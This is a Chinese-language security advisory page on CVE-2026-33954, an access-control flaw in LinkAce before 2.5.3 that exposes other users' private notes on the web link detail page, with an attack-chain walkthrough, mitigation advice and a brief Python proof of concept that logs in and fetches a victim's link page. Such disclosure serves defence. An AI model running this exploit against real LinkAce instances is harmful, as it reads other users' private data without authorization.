IPBUF安全漏洞报告
English
CVE-2026-33954 CVSS 6.5 中危

CVE-2026-33954: LinkAce 私有笔记信息泄露漏洞

披露日期: 2026-03-27
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33954
漏洞类型
信息泄露
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
LinkAce

相关标签

信息泄露权限绕过LinkAceIDORWeb安全

漏洞概述

LinkAce 是一个自托管链接归档工具。在 2.5.3 版本之前,该产品存在信息泄露漏洞。虽然 API 正确执行了权限检查,但 Web 界面的链接详情页面在渲染笔记时,未正确应用可见性过滤。这导致经过身份认证的用户在查看其他用户的“内部”或“公开”链接时,能够读取附加在该链接上的“私有”笔记,造成敏感信息泄露。

技术细节

该漏洞主要源于 LinkAce 的 Web 界面渲染逻辑与 API 权限验证机制的不一致。虽然 API 接口正确实施了访问控制,确保私有笔记仅对所有者可见,但 Web 链接详情页面的数据查询逻辑存在缺陷。在处理请求时,系统仅验证了用户是否有权访问链接本身(即链接状态为公开或内部),却未进一步校验用户是否有权查看附加在该链接下的笔记内容。这导致当低权限用户访问其他用户的公开或内部链接详情页时,后端数据库查询会返回关联的私有笔记,并在前端页面中直接渲染。攻击者利用此差异,仅需拥有普通账号权限,即可通过简单的 Web 访问窃取敏感的私有数据。

攻击链分析

STEP 1
侦察与注册
攻击者识别目标 LinkAce 实例,并注册一个普通用户账号。
STEP 2
寻找目标
攻击者浏览平台,寻找其他用户发布的“内部”或“公开”状态的链接。
STEP 3
访问详情页
攻击者点击进入目标链接的详情页面。此时系统验证攻击者是否有权查看该链接,验证通过。
STEP 4
数据泄露
后端在渲染页面时,未过滤该链接下的“私有”笔记,直接将其包含在 HTML 响应中返回给攻击者。
STEP 5
信息窃取
攻击者通过查看网页源代码或直接阅读页面内容,获取本不应可见的私有笔记信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_base_url = "http://localhost:8000" login_url = f"{target_base_url}/login" link_detail_url = f"{target_base_url}/links/{{link_id}}" # Attacker credentials (low privilege user) session = requests.Session() payload = { "email": "[email protected]", "password": "attacker_password" } # Step 1: Login to get authenticated session response = session.post(login_url, data=payload) if response.status_code != 200: print("[!] Login failed") exit(1) print("[+] Logged in successfully") # Step 2: Access a link shared by another user (Internal or Public) # Assume '1' is a link ID belonging to a victim user victim_link_id = 1 vuln_url = link_detail_url.format(link_id=victim_link_id) response = session.get(vuln_url) # Step 3: Check if private notes are leaked in the response # The vulnerability exposes private notes in the HTML response if "private_note_content" in response.text: print(f"[!] Vulnerability confirmed! Private note leaked at {vuln_url}") else: print("[-] Private note not found or system patched")

影响范围

LinkAce < 2.5.3

防御指南

临时缓解措施
建议立即升级至 2.5.3 版本以修复此漏洞。如果暂时无法升级,应限制用户对 Web 界面的访问权限,或通过 WAF 拦截对链接详情页的非必要请求,防止敏感数据泄露。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表